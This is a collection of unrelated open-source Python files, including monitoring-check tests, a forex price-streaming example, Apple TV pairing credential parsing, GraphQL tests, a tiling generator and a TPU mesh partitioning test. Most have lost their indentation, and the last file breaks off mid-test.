from .common import CHECK_NAME, CONTAINER_NAME, GUNICORN_VERSION, INSTANCE
# TODO: Test metadata in e2e when we can collect metadata from the agent
CHECK_ID = 'test:123'
def _assert_metadata(datadog_agent):
major, minor, patch = GUNICORN_VERSION.split('.')
version_metadata = {
'version.scheme': 'semver',
'version.major': major,
'version.minor': minor,
'version.patch': patch,
'version.raw': GUNICORN_VERSION,
}
datadog_agent.assert_metadata(CHECK_ID, version_metadata)
datadog_agent.assert_metadata_count(5)
@pytest.mark.skipif(not GUNICORN_VERSION, reason='Require GUNICORN_VERSION')
def test_collect_metadata_instance(aggregator, datadog_agent, setup_gunicorn):
instance = INSTANCE.copy()
instance['gunicorn'] = setup_gunicorn['gunicorn_bin_path']
check = GUnicornCheck(CHECK_NAME, {}, [instance])
check.check_id = CHECK_ID
check.check(instance)
_assert_metadata(datadog_agent)
@pytest.mark.skipif(not GUNICORN_VERSION, reason='Require GUNICORN_VERSION')
def test_collect_metadata_init_config(aggregator, datadog_agent, setup_gunicorn):
init_config = {'gunicorn': setup_gunicorn['gunicorn_bin_path']}
check = GUnicornCheck(CHECK_NAME, init_config, [INSTANCE])
check.check_id = CHECK_ID
check.check(INSTANCE)
_assert_metadata(datadog_agent)
@pytest.mark.skipif(not GUNICORN_VERSION, reason='Require GUNICORN_VERSION')
@pytest.mark.usefixtures('dd_environment')
def test_collect_metadata_docker(aggregator, datadog_agent, setup_gunicorn):
instance = INSTANCE.copy()
instance['gunicorn'] = 'docker exec {} gunicorn'.format(CONTAINER_NAME)
check = GUnicornCheck(CHECK_NAME, {}, [instance])
check.check_id = CHECK_ID
check.check(instance)
_assert_metadata(datadog_agent)
def test_collect_metadata_count(aggregator, datadog_agent, setup_gunicorn):
instance = INSTANCE.copy()
instance['gunicorn'] = setup_gunicorn['gunicorn_bin_path']
check = GUnicornCheck(CHECK_NAME, {}, [instance])
check.check_id = 'test:123'
check.check(instance)
datadog_agent.assert_metadata_count(5)
def test_collect_metadata_invalid_binary(aggregator, datadog_agent, setup_gunicorn):
instance = INSTANCE.copy()
instance['gunicorn'] = '/bin/not_exist'
check = GUnicornCheck(CHECK_NAME, {}, [instance])
check.check_id = CHECK_ID
check.check(instance)
datadog_agent.assert_metadata_count(0)
|
src/streaming_prices.py | doc-jem/oandapyV20-examples | 127 | 12718588 | # -*- coding: utf-8 -*-
"""Streaming price data.
Demonstrate the PricingStream request and convenient handling of data using Pydantic.
Usage:
streaming_prices.py --instrument <instrument> [--instrument <instrument>] [--nice] [--timeout <timeout>] [--count <count>]
Options:
--nice json indented formatting
--timeout=<timeout> timeout in seconds
--count=<count> # of records to receive [default: 0] unlimited
"""
import json
from oandapyV20 import API
from oandapyV20.exceptions import V20Error, StreamTerminated
from oandapyV20.endpoints.pricing import PricingStream
from exampleauth import exampleAuth
from requests.exceptions import ConnectionError
import logging
from typing import List
from pydantic import BaseModel
from datetime import datetime
logging.basicConfig(
filename="pricingstream.log",
level=logging.INFO,
format='%(asctime)s [%(levelname)s] %(name)s : %(message)s',
)
logger = logging.getLogger(__name__)
class HeartBeat(BaseModel):
type: str
time: datetime
class Price(BaseModel):
price: float
liquidity: int
class PriceRecord(BaseModel):
instrument: str
type: str
time: datetime
closeoutBid: float
closeoutAsk: float
status: str
tradeable: bool
bids: List[Price]
asks: List[Price]
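# ---------------------------------------------------------------------------
# Editor's note: illustrative example only, not part of the original script.
# It builds a PriceRecord matching the model declared above; every value is
# made up and only meant to show the shape of a parsed PRICE message.
def _example_price_record() -> PriceRecord:
    return PriceRecord(
        instrument="EUR_USD",
        type="PRICE",
        time="2021-01-04T12:00:00Z",
        closeoutBid=1.2249,
        closeoutAsk=1.2251,
        status="tradeable",
        tradeable=True,
        bids=[Price(price=1.2250, liquidity=10000000)],
        asks=[Price(price=1.2251, liquidity=10000000)],
    )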
def main(clargs):
accountID, access_token = exampleAuth()
request_params = {}
if clargs['--timeout']:
request_params = {"timeout": clargs['--timeout']}
# fetch MAXREC stream records
MAXREC = int(clargs['--count'])
api = API(access_token=access_token,
environment="practice",
request_params=request_params)
# setup the stream request
r = PricingStream(accountID=accountID,
params={"instruments": ",".join(clargs['<instrument>'])})
n = 0
_m = {"PRICE": PriceRecord,
"HEARTBEAT": HeartBeat}
while True:
try:
for rv in api.request(r):
# create a Pydantic record based on the type
rec = _m[rv['type']](**rv)
n += 1
if MAXREC and n >= MAXREC:
r.terminate("maxrecs received: {}".format(MAXREC))
print(rec.json() if clargs['--nice'] else rec)
except V20Error as e:
# catch API related errors that may occur
logger.error("V20Error: %s", e)
break
except ConnectionError as e:
logger.error("%s", e)
except StreamTerminated as e:
logger.error("Stopping: %s", e)
break
except Exception as e:
logger.error("%s", e)
break
if __name__ == '__main__':
from docopt import docopt
# commandline args ...
clargs = docopt(__doc__)
main(clargs)
|
office365/sharepoint/userprofiles/followedItem.py | wreiner/Office365-REST-Python-Client | 544 | 12718615 | from office365.runtime.client_value import ClientValue
class FollowedItem(ClientValue):
pass
|
freenom_dns_updater/exception/add_error.py | anhdhbn/Freenom-dns-updater | 160 | 12718625 | from .dns_record_base_exception import DnsRecordBaseException
class AddError(DnsRecordBaseException):
pass
|
pyatv/auth/hap_pairing.py | Jacobs4/pyatv | 532 | 12718627 | """Abstraction for authentication based on HAP/SRP."""
import binascii
from enum import Enum, auto
from typing import Optional, Tuple
from pyatv import exceptions
# pylint: disable=invalid-name
class AuthenticationType(Enum):
"""Supported authentication type."""
Null = auto()
"""No authentication (just pass through)."""
Legacy = auto()
"""Legacy SRP based authentication."""
HAP = auto()
"""Authentication based on HAP (Home-Kit)."""
Transient = auto()
"""Authentication based on transient HAP (Home-Kit)."""
# pylint: enable=invalid-name
class HapCredentials:
"""Identifiers and encryption keys used by HAP."""
def __init__(
self,
ltpk: bytes = b"",
ltsk: bytes = b"",
atv_id: bytes = b"",
client_id: bytes = b"",
) -> None:
"""Initialize a new Credentials."""
self.ltpk: bytes = ltpk
self.ltsk: bytes = ltsk
self.atv_id: bytes = atv_id
self.client_id: bytes = client_id
self.type: AuthenticationType = self._get_auth_type()
def _get_auth_type(self) -> AuthenticationType:
if (
self.ltpk == b""
and self.ltsk == b""
and self.atv_id == b""
and self.client_id == b""
):
return AuthenticationType.Null
if self.ltpk == b"transient":
return AuthenticationType.Transient
if (
self.ltpk == b""
and self.ltsk != b""
and self.atv_id == b""
and self.client_id != b""
):
return AuthenticationType.Legacy
if self.ltpk and self.ltsk and self.atv_id and self.client_id:
return AuthenticationType.HAP
raise exceptions.InvalidCredentialsError("invalid credentials type")
def __eq__(self, other: object) -> bool:
"""Return if two instances of HapCredentials are equal."""
if isinstance(other, HapCredentials):
return str(other) == str(self)
return False
def __str__(self) -> str:
"""Return a string representation of credentials."""
return ":".join(
[
binascii.hexlify(self.ltpk).decode("utf-8"),
binascii.hexlify(self.ltsk).decode("utf-8"),
binascii.hexlify(self.atv_id).decode("utf-8"),
binascii.hexlify(self.client_id).decode("utf-8"),
]
)
class PairSetupProcedure:
"""Perform pair setup procedure to authenticate a new device."""
async def start_pairing(self) -> None:
"""Start the pairing process.
This method will show the expected PIN on screen.
"""
async def finish_pairing(self, username: str, pin_code: int) -> HapCredentials:
"""Finish pairing process.
A username and the PIN code (usually shown on screen) must be provided.
"""
class PairVerifyProcedure:
"""Verify if credentials are valid and derive encryption keys."""
async def verify_credentials(self) -> bool:
"""Verify if credentials are valid and returns True if keys are generated."""
def encryption_keys(
self, salt: str, output_info: str, input_info: str
) -> Tuple[str, str]:
"""Return derived encryption keys."""
NO_CREDENTIALS = HapCredentials()
TRANSIENT_CREDENTIALS = HapCredentials(b"transient")
def parse_credentials(detail_string: Optional[str]) -> HapCredentials:
"""Parse a string represention of HapCredentials."""
if detail_string is None:
return NO_CREDENTIALS
split = detail_string.split(":")
# Compatibility with "legacy credentials" used by AirPlay where seed is stored
# as LTSK and identifier as client_id (others are empty).
if len(split) == 2:
client_id = binascii.unhexlify(split[0])
ltsk = binascii.unhexlify(split[1])
return HapCredentials(b"", ltsk, b"", client_id)
if len(split) == 4:
ltpk = binascii.unhexlify(split[0])
ltsk = binascii.unhexlify(split[1])
atv_id = binascii.unhexlify(split[2])
client_id = binascii.unhexlify(split[3])
return HapCredentials(ltpk, ltsk, atv_id, client_id)
raise exceptions.InvalidCredentialsError("invalid credentials: " + detail_string)
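# ---------------------------------------------------------------------------
# Editor's note: illustrative sketch only, not part of the original module.
# It shows how a credentials string round-trips through parse_credentials()
# and str(HapCredentials); the hex values below are made up.
if __name__ == "__main__":
    demo_string = "aa11:bb22:cc33:dd44"
    demo_creds = parse_credentials(demo_string)
    assert demo_creds.type == AuthenticationType.HAP
    assert str(demo_creds) == demo_string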
|
tests/functional/regressions/test_issue213.py | remorses/tartiflette-whl | 530 | 12718661 | import pytest
from tartiflette import Resolver, create_engine
_SDL = """
type Query {
hello(name: String = "Unknown"): String
bye(name: String! = "Unknown"): String
}
"""
@pytest.fixture(scope="module")
async def ttftt_engine():
@Resolver("Query.hello", schema_name="test_issue213")
async def resolve_query_hello(parent, args, ctx, info):
return args.get("name")
class QueryByResolver:
async def __call__(self, parent, args, ctx, info):
return args.get("name")
Resolver("Query.bye", schema_name="test_issue213")(QueryByResolver())
return await create_engine(sdl=_SDL, schema_name="test_issue213")
@pytest.mark.asyncio
@pytest.mark.parametrize(
"query,variables,expected",
[
# Without variables
(
"""
query {
hello
}
""",
None,
{"data": {"hello": "Unknown"}},
),
(
"""
query {
hello(name: "Name")
}
""",
None,
{"data": {"hello": "Name"}},
),
(
"""
query {
hello(name: null)
}
""",
None,
{"data": {"hello": None}},
),
(
"""
query {
bye
}
""",
None,
{"data": {"bye": "Unknown"}},
),
(
"""
query {
bye(name: "Name")
}
""",
None,
{"data": {"bye": "Name"}},
),
(
"""
query {
bye(name: null)
}
""",
None,
{
"data": None,
"errors": [
{
"message": "Argument < name > of non-null type < String! > must not be null.",
"path": ["bye"],
"locations": [{"line": 3, "column": 19}],
"extensions": {
"rule": "5.6.1",
"spec": "June 2018",
"details": "https://graphql.github.io/graphql-spec/June2018/#sec-Values-of-Correct-Type",
"tag": "values-of-correct-type",
},
}
],
},
),
# With variables
(
"""
query ($name: String) {
hello(name: $name)
}
""",
{},
{"data": {"hello": "Unknown"}},
),
(
"""
query ($name: String) {
hello(name: $name)
}
""",
{"name": "Name"},
{"data": {"hello": "Name"}},
),
(
"""
query ($name: String) {
hello(name: $name)
}
""",
{"name": None},
{"data": {"hello": None}},
),
(
"""
query ($name: String) {
bye(name: $name)
}
""",
{},
{"data": {"bye": "Unknown"}},
),
(
"""
query ($name: String) {
bye(name: $name)
}
""",
{"name": "Name"},
{"data": {"bye": "Name"}},
),
(
"""
query ($name: String) {
bye(name: $name)
}
""",
{"name": None},
{
"data": {"bye": None},
"errors": [
{
"message": "Argument < name > of non-null type < String! > must not be null.",
"path": ["bye"],
"locations": [{"line": 3, "column": 25}],
}
],
},
),
(
"""
query ($name: String!) {
bye(name: $name)
}
""",
{"name": None},
{
"data": None,
"errors": [
{
"message": "Variable < $name > of non-null type < String! > must not be null.",
"path": None,
"locations": [{"line": 2, "column": 20}],
}
],
},
),
],
)
async def test_issue213(query, variables, expected, ttftt_engine):
assert await ttftt_engine.execute(query, variables=variables) == expected
|
platypush/backend/nodered/runner.py | RichardChiang/platypush | 228 | 12718673 | import json
from pynodered import node_red
from platypush.context import get_plugin
# noinspection PyUnusedLocal
@node_red(name='run', title='run', category='platypush', description='Run a platypush action')
def run(node, msg):
msg = msg['payload']
if isinstance(msg, bytes):
msg = msg.decode()
if isinstance(msg, str):
msg = json.loads(msg)
assert isinstance(msg, dict) and 'action' in msg
if 'type' not in msg:
msg['type'] = 'request'
plugin_name = '.'.join(msg['action'].split('.')[:-1])
action_name = msg['action'].split('.')[-1]
plugin = get_plugin(plugin_name)
action = getattr(plugin, action_name)
args = msg.get('args', {})
response = action(**args)
if response.errors:
raise response.errors[0]
msg['payload'] = response.output
return msg
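# ---------------------------------------------------------------------------
# Editor's note: illustrative example only, not part of the original backend.
# This is the kind of payload the node above accepts; the plugin/action name
# and its arguments are hypothetical and must match a plugin available on the
# Platypush host.
_EXAMPLE_MSG = {
    'payload': {
        'type': 'request',
        'action': 'light.hue.on',          # hypothetical '<plugin>.<action>'
        'args': {'groups': ['Living Room']},
    }
}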
# vim:sw=4:ts=4:et:
|
tessagon/core/rotate_tile_generator.py | virtualritz/tessagon | 199 | 12718691 | from tessagon.core.tile_generator import TileGenerator
from tessagon.core.abstract_tile import AbstractTile
class RotateTileGenerator(TileGenerator):
# This generates tiles that are rotated from a regular
# grid arrangement.
def __init__(self, tessagon, **kwargs):
super().__init__(tessagon, **kwargs)
self.rot_factor = kwargs['rot_factor']
self.color_pattern = kwargs.get('color_pattern') or None
# Rot tiles are not tiles, they are a collection of tiles.
# They generate interior tiles ((rot_factor - 1)^2 of them) and
# up to 2 * rot_factor boundary tiles that are shared with neighbors
# (if they exist).
# Maximum tiles generated per rot_tile is rot_factor^2 + 1 tiles
# With this in mind, you'll want to set u_num and v_num lower than
# you would with the grid tile generator
self.rot_tiles = None
self.id_prefix = 'rot_tiles'
def create_tiles(self):
self.rot_tiles \
= self.initialize_tiles(RotTile,
rot_factor=self.rot_factor,
color_pattern=self.color_pattern)
self.initialize_neighbors(self.rot_tiles)
self.initialize_interiors()
self.initialize_boundaries()
self.calculate_boundary_neighbors()
return self.calculate_rot_tiles()
def initialize_interiors(self):
for rot_tile in [j for i in self.rot_tiles for j in i]:
rot_tile.initialize_interior()
def initialize_boundaries(self):
for rot_tile in [j for i in self.rot_tiles for j in i]:
rot_tile.initialize_boundary()
def calculate_boundary_neighbors(self):
for rot_tile in [j for i in self.rot_tiles for j in i]:
rot_tile.calculate_boundary_neighbors()
def calculate_rot_tiles(self):
tiles = []
for rot_tile in [j for i in self.rot_tiles for j in i]:
tiles += rot_tile.create_tiles()
return tiles
# This is both a kind of tile and a tile generator
# It hurts my brain thinking about this stuff
class RotTile(AbstractTile):
def __init__(self, tessagon, **kwargs):
super().__init__(tessagon, **kwargs)
self.n = kwargs['rot_factor']
# the interior and each boundary is a collection of tiles
self.interior = None
self.boundary = {'left': None,
'right': None,
'top': None,
'bottom': None}
self.interior_corners = None
self.color_pattern = kwargs.get('color_pattern') or None
self.u_num = self.tessagon.tile_generator.u_num
# We'll use these constants a lot
n2_p1 = self.n**2 + 1.0
self.c1 = 1.0 / n2_p1
self.c2 = self.n / n2_p1
self.c3 = 1.0 - self.c2
self.c4 = 1.0 - self.c1
self.tiles = []
def initialize_interior(self):
self.interior_corners = [self.blend(self.c2, self.c1),
self.blend(self.c4, self.c2),
self.blend(self.c1, self.c3),
self.blend(self.c3, self.c4)]
if self.n < 2:
return
offset = self.basic_offset(self.fingerprint)
generator = TileGenerator(self.tessagon,
corners=self.interior_corners,
u_num=self.n-1, v_num=self.n-1,
u_cyclic=False, v_cyclic=False,
id_prefix=self.id + '.interior',
color_pattern=self.color_pattern,
fingerprint_offset=offset)
self.interior \
= generator.initialize_tiles(self.tessagon.__class__.tile_class)
generator.initialize_neighbors(self.interior)
self.tiles += self._flatten_list(self.interior)
def basic_offset(self, fingerprint):
return [fingerprint[0] * self.n + fingerprint[1] + 1,
self.u_num - fingerprint[0] + fingerprint[1] * self.n]
def create_tiles(self):
return self.tiles
def initialize_boundary(self):
self.initialize_left_boundary(self.id + ".boundary['left']")
self.initialize_right_boundary(self.id + ".boundary['right']")
self.initialize_top_boundary(self.id + ".boundary['top']")
self.initialize_bottom_boundary(self.id + ".boundary['bottom']")
def initialize_left_boundary(self, id_prefix):
if not self.boundary['left']:
tile = self.get_neighbor_tile(['left'])
if tile:
corners = [self.blend(0, 0),
self.blend(self.c2, self.c1),
self.blend(self.c3 - 1.0, self.c4),
self.blend(0, 1)]
offset = self.basic_offset(self.fingerprint)
offset[0] -= 1
generator = TileGenerator(self.tessagon,
corners=corners,
u_num=1, v_num=self.n,
u_cyclic=False, v_cyclic=False,
id_prefix=id_prefix,
color_pattern=self.color_pattern,
fingerprint_offset=offset)
tiles = generator.initialize_tiles(self.tessagon.tile_class)
generator.initialize_neighbors(tiles)
self.boundary['left'] = tiles
tile.boundary['right'] = tiles
self.tiles += self._flatten_list(tiles)
def initialize_bottom_boundary(self, id_prefix):
if not self.boundary['bottom']:
tile = self.get_neighbor_tile(['bottom'])
if tile:
corners = [self.blend(self.c1, self.c3 - 1.0),
self.blend(1, 0),
self.blend(0, 0),
self.blend(self.c4, self.c2)]
offset = self.basic_offset(self.fingerprint)
offset[0] -= 1
offset[1] -= 1
generator = TileGenerator(self.tessagon,
corners=corners,
u_num=self.n, v_num=1,
u_cyclic=False, v_cyclic=False,
id_prefix=id_prefix,
color_pattern=self.color_pattern,
fingerprint_offset=offset)
tiles = generator.initialize_tiles(self.tessagon.tile_class)
generator.initialize_neighbors(tiles)
self.boundary['bottom'] = tiles
tile.boundary['top'] = tiles
self.tiles += self._flatten_list(tiles)
def initialize_right_boundary(self, id_prefix):
if not self.boundary['right']:
tile = self.get_neighbor_tile(['right'])
if tile:
tile.initialize_left_boundary(id_prefix)
def initialize_top_boundary(self, id_prefix):
if not self.boundary['top']:
tile = self.get_neighbor_tile(['top'])
if tile:
tile.initialize_bottom_boundary(id_prefix)
def calculate_boundary_neighbors(self):
self.calculate_left_boundary_neighbors()
self.calculate_right_boundary_neighbors()
self.calculate_top_boundary_neighbors()
self.calculate_bottom_boundary_neighbors()
def calculate_left_boundary_neighbors(self):
if self.boundary['left']:
for i in range(self.n - 1):
boundary_tile = self.boundary['left'][0][i]
other_tile = None
if self.n > 1:
other_tile = self.interior[0][i]
if other_tile:
boundary_tile.neighbors['right'] = other_tile
other_tile.neighbors['left'] = boundary_tile
if self.boundary['top']:
boundary_tile = self.boundary['left'][0][self.n-1]
other_tile = self.boundary['top'][0][0]
boundary_tile.neighbors['right'] = other_tile
other_tile.neighbors['left'] = boundary_tile
def calculate_bottom_boundary_neighbors(self):
if self.boundary['bottom']:
for i in range(self.n - 1):
boundary_tile = self.boundary['bottom'][i+1][0]
other_tile = None
if self.n > 1:
other_tile = self.interior[i][0]
if other_tile:
boundary_tile.neighbors['top'] = other_tile
other_tile.neighbors['bottom'] = boundary_tile
if self.boundary['left']:
boundary_tile = self.boundary['bottom'][0][0]
other_tile = self.boundary['left'][0][0]
boundary_tile.neighbors['top'] = other_tile
other_tile.neighbors['bottom'] = boundary_tile
def calculate_right_boundary_neighbors(self):
if self.boundary['right']:
for i in range(self.n - 1):
boundary_tile = self.boundary['right'][0][i+1]
other_tile = None
if self.n > 1:
other_tile = self.interior[self.n-2][i]
if other_tile:
boundary_tile.neighbors['left'] = other_tile
other_tile.neighbors['right'] = boundary_tile
if self.boundary['bottom']:
boundary_tile = self.boundary['right'][0][0]
other_tile = self.boundary['bottom'][self.n-1][0]
boundary_tile.neighbors['left'] = other_tile
other_tile.neighbors['right'] = boundary_tile
def calculate_top_boundary_neighbors(self):
if self.boundary['top']:
for i in range(self.n - 1):
boundary_tile = self.boundary['top'][i][0]
other_tile = None
if self.n > 1:
other_tile = self.interior[i][self.n-2]
if other_tile:
boundary_tile.neighbors['bottom'] = other_tile
other_tile.neighbors['top'] = boundary_tile
if self.boundary['right']:
boundary_tile = self.boundary['top'][self.n-1][0]
other_tile = self.boundary['right'][0][self.n-1]
boundary_tile.neighbors['bottom'] = other_tile
other_tile.neighbors['top'] = boundary_tile
    def _flatten_list(self, nested):
        return [item for sublist in nested for item in sublist]
|
vmoe/partitioning_test.py | google-research/vmoe | 205 | 12718703 | # Copyright (c) 2022 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for partitioning."""
import functools
import itertools
import logging
import re
from unittest import mock
from absl.testing import absltest
from absl.testing import parameterized
import jax
import jax.numpy as jnp
import numpy as np
from vmoe import partitioning
PartitionSpec = partitioning.PartitionSpec
class PartitioningTest(parameterized.TestCase):
@parameterized.parameters((0, True), (1, False), (2, True))
def test_process_has_contiguous_device_slice(self, process_index, expected):
def mk_dev(process_index):
return _make_device(process_index=process_index)
devices = np.asarray([
[mk_dev(0), mk_dev(0), mk_dev(1)],
[mk_dev(0), mk_dev(0), mk_dev(2)],
[mk_dev(0), mk_dev(0), mk_dev(1)],
])
self.assertEqual(
partitioning.process_has_contiguous_device_slice(
devices, process_index), expected)
@parameterized.named_parameters(
('false', [[0, 0, 1], [0, 0, 2], [0, 0, 1]], False),
('true', [[0, 0, 0], [0, 0, 0], [1, 1, 1]], True),
)
def test_processes_have_contiguous_device_slices(self, devices, expected):
def mk_dev(process_index):
return _make_device(process_index=process_index)
devices = np.asarray(devices)
devices = np.vectorize(mk_dev, otypes=[np.object])(devices)
self.assertEqual(
partitioning.processes_have_contiguous_device_slices(devices),
expected)
@parameterized.parameters(('other'), ('tpu'))
def test_get_auto_logical_mesh(self, platform):
"""Tests that the right auto_logical_mesh is run, based on the platform."""
hardware_mesh = mock.MagicMock()
device = _make_device(platform=platform)
with mock.patch.object(
partitioning,
f'get_hardware_mesh_{platform}',
return_value=hardware_mesh):
with mock.patch.object(
partitioning, f'get_auto_logical_mesh_{platform}') as mock_get:
partitioning.get_auto_logical_mesh(2, [device])
mock_get.assert_called_with(2, hardware_mesh)
@parameterized.named_parameters(
('2', 2, (2, 1)),
('4', 4, (4, 1)),
('8', 8, (4, 2)),
)
@mock.patch.object(partitioning, 'get_logical_mesh')
def test_get_auto_logical_mesh_other(self, num_partitions, expected_tuple,
get_logical_mesh_mock):
"""Tests that each axis is partitioned as expected on devices != TPU."""
hardware_mesh = np.empty((4, 8))
partitioning.get_auto_logical_mesh_other(num_partitions, hardware_mesh)
get_logical_mesh_mock.assert_called_with(expected_tuple, hardware_mesh)
def test_get_auto_logical_mesh_other_error(self):
"""Tests that an exception is raised if the number of partitions is not supported."""
hardware_mesh = np.empty((3, 5))
with self.assertRaisesRegex(ValueError, 'The hardware mesh with shape'):
partitioning.get_auto_logical_mesh_other(2, hardware_mesh)
@parameterized.named_parameters(
('v3_2', 2, (2, 2, 4, 1), (1, 2, 1, 1)),
('v3_4', 4, (2, 2, 4, 1), (1, 2, 2, 1)),
('v3_8', 8, (2, 2, 4, 1), (1, 2, 4, 1)),
('v3_16', 16, (2, 2, 4, 1), (2, 2, 4, 1)),
('v4_2', 2, (2, 2, 4, 2), (1, 1, 1, 2)),
('v4_4', 4, (2, 2, 4, 2), (1, 1, 2, 2)),
('v4_8', 8, (2, 2, 4, 2), (1, 1, 4, 2)),
('v4_16', 16, (2, 2, 4, 2), (1, 2, 4, 2)),
('v4_32', 32, (2, 2, 4, 2), (2, 2, 4, 2)),
)
@mock.patch.object(partitioning, 'get_logical_mesh')
def test_get_auto_logical_mesh_tpu(self, num_partitions, hardware_mesh_shape,
expected_tuple, get_logical_mesh_mock):
"""Tests that each axis is partitioned as expected on TPU devices."""
hardware_mesh = np.empty(hardware_mesh_shape)
partitioning.get_auto_logical_mesh_tpu(num_partitions, hardware_mesh)
get_logical_mesh_mock.assert_called_with(expected_tuple, hardware_mesh)
def test_get_auto_logical_mesh_tpu_error(self):
"""Tests that an exception is raised if the number of partitions is not supported."""
hardware_mesh = np.empty((3, 5, 7, 9))
with self.assertRaisesRegex(ValueError, 'The hardware mesh with shape'):
partitioning.get_auto_logical_mesh_tpu(6, hardware_mesh)
@parameterized.named_parameters(
('cpu0', (0, 0), (0, 0)),
('cpu1', (23, 5), (3, 5)),
)
@mock.patch.object(partitioning.jax, 'local_device_count', return_value=4)
def test_get_device_coords_other(self, device_attrs, expected_coord, _):
"""Tests that the device coordinates are good for devices other than TPU."""
device_id, process_id = device_attrs
device = _make_device(
id=device_id, process_index=process_id, platform='cpu')
self.assertTupleEqual(
partitioning.get_device_coords_other(device), expected_coord)
@parameterized.named_parameters(
('tpu0', (0, 0, 0, 0)),
('tpu1', (0, 1, 2, 3)),
)
def test_get_device_coords_tpu(self, expected_coord):
"""Tests that the device coordinates are good for TPU devices."""
core_on_chip, x, y, z = expected_coord
device = _make_device(
core_on_chip=core_on_chip, coords=(x, y, z), platform='tpu')
self.assertTupleEqual(
partitioning.get_device_coords_tpu(device), expected_coord)
def test_get_hardware_mesh_local_shape(self):
local_devices = [
# Local devices presented in arbitrary order.
_make_device(core_on_chip=0, coords=(2, 2, 0), platform='tpu'),
_make_device(core_on_chip=0, coords=(2, 3, 0), platform='tpu'),
_make_device(core_on_chip=0, coords=(3, 2, 0), platform='tpu'),
_make_device(core_on_chip=0, coords=(3, 1, 0), platform='tpu'),
_make_device(core_on_chip=0, coords=(3, 3, 0), platform='tpu'),
_make_device(core_on_chip=0, coords=(2, 1, 0), platform='tpu'),
]
shape = partitioning.get_hardware_mesh_local_shape(local_devices)
expected_shape = (1, 2, 3, 1)
self.assertEqual(shape, expected_shape)
@mock.patch.object(partitioning.jax, 'local_device_count', return_value=2)
def test_get_hardware_mesh_other(self, _):
"""Tests the hardware mesh (with 6 total CPU devices in 2 processes)."""
devices = []
for process_index in range(3):
for device_id in range(process_index * 2, process_index * 2 + 2):
devices.append(
_make_device(
id=device_id, process_index=process_index, platform='cpu'))
hardware_mesh = partitioning.get_hardware_mesh_other(devices)
expected_hardware_mesh = np.array([[devices[0], devices[2], devices[4]],
[devices[1], devices[3], devices[5]]])
np.testing.assert_array_equal(hardware_mesh, expected_hardware_mesh)
def test_get_hardware_mesh_tpu(self):
"""Tests the hardware mesh (with 12 TPU devices, in a (2, 3, 1, 2) mesh)."""
devices = []
for z, y, x, core_on_chip in itertools.product(
range(2), range(3), range(1), range(2)):
devices.append(
_make_device(
core_on_chip=core_on_chip, coords=(x, y, z), platform='tpu'))
hardware_mesh = partitioning.get_hardware_mesh_tpu(devices)
expected_hardware_mesh = np.array([
# core_on_chip=0.
[[[devices[0], devices[6]],
[devices[2], devices[8]],
[devices[4], devices[10]]]],
# core_on_chip=1.
[[[devices[1], devices[7]],
[devices[3], devices[9]],
[devices[5], devices[11]]]]
], dtype=np.object)
np.testing.assert_array_equal(hardware_mesh, expected_hardware_mesh)
def test_get_logical_mesh_default(self):
"""Tests the logical mesh with a 2x4 hardware mesh."""
# Note: The values in hardware_mesh would typically be Devices, but these
# are fine for testing. This is a 2x4 hardware mesh.
hardware_mesh = np.array([[1, 2, 3, 4], # partition_ids: 0 0 1 1
[5, 6, 7, 8]]) # 2 2 3 3
partitions, replicas = (2, 2), (1, 2)
mesh = partitioning.get_logical_mesh_default(
partitions, replicas, hardware_mesh)
self.assertIsInstance(mesh, partitioning.maps.Mesh)
np.testing.assert_array_equal(mesh.devices,
[[1, 2], [3, 4], [5, 6], [7, 8]])
self.assertTupleEqual(mesh.axis_names, ('expert', 'replica'))
def test_get_logical_mesh_tile_by_process(self):
# Note: The values in hardware_mesh would typically be Devices, but these
# are fine for testing. This is a 2x4 hardware mesh.
# partition_ids: 0 0 1 1 | process_ids: 0 1 2 3
# 2 2 3 3 | 0 1 2 3
hardware_mesh = np.asarray([[1, 2, 3, 4],
[5, 6, 7, 8]])
partitions, replicas = (2, 2), (1, 2)
hardware_mesh_local_shape = (2, 1)
mesh = partitioning.get_logical_mesh_tile_by_process(
partitions, replicas, hardware_mesh, hardware_mesh_local_shape)
self.assertIsInstance(mesh, partitioning.maps.Mesh)
np.testing.assert_array_equal(mesh.devices,
[[1, 2], [5, 6], [3, 4], [7, 8]])
self.assertTupleEqual(mesh.axis_names, ('expert', 'replica'))
def test_get_logical_mesh_tile_by_process_raises(self):
hardware_mesh = np.zeros((3, 3))
partitions, replicas = (3, 1), (1, 3)
hardware_mesh_local_shape = (1, 2)
with self.assertRaises(ValueError):
partitioning.get_logical_mesh_tile_by_process(
partitions, replicas, hardware_mesh, hardware_mesh_local_shape)
@mock.patch.object(partitioning,
'processes_have_contiguous_device_slices',
return_value=False)
@mock.patch.object(partitioning, 'get_hardware_mesh_local_shape')
def test_get_logical_mesh(self, mock_get_hardware_mesh_local_shape, _):
# Note: The values in hardware_mesh would typically be Devices, but these
# are fine for testing. This is a 2x4 hardware mesh.
# partition_ids: 0 1 2 3 | process_ids: 0 0 2 3
# 0 1 2 3 | 1 1 2 3
hardware_mesh = np.asarray([[1, 2, 3, 4],
[5, 6, 7, 8]])
mock_get_hardware_mesh_local_shape.return_value = (2, 1)
mesh = partitioning.get_logical_mesh((2, 2), hardware_mesh)
np.testing.assert_array_equal(mesh.devices,
[[1, 2], [5, 6], [3, 4], [7, 8]])
def test_log_logical_mesh_tpu(self):
mk_dev = functools.partial(_make_device, platform='tpu')
devices = [
[
mk_dev(core_on_chip=0, coords=(0, 0, 0), process_index=0),
mk_dev(core_on_chip=1, coords=(0, 0, 0), process_index=1),
mk_dev(core_on_chip=0, coords=(10, 0, 0), process_index=10),
mk_dev(core_on_chip=1, coords=(10, 0, 0), process_index=11),
],
[
mk_dev(core_on_chip=0, coords=(0, 100, 0), process_index=1),
mk_dev(core_on_chip=1, coords=(0, 100, 0), process_index=2),
mk_dev(core_on_chip=0, coords=(10, 1, 0), process_index=3),
mk_dev(core_on_chip=1, coords=(10, 1, 0), process_index=4),
],
]
mesh = partitioning.Mesh(devices=np.asarray(devices), axis_names=('a', 'b'))
logger = logging.getLogger('foo')
with self.assertLogs(logger) as cm:
partitioning.log_logical_mesh(mesh, logger=logger)
self.assertRegex(
cm.output[0],
re.escape("Logical device mesh has axis_names = ('a', 'b')"))
self.assertRegex(
cm.output[1],
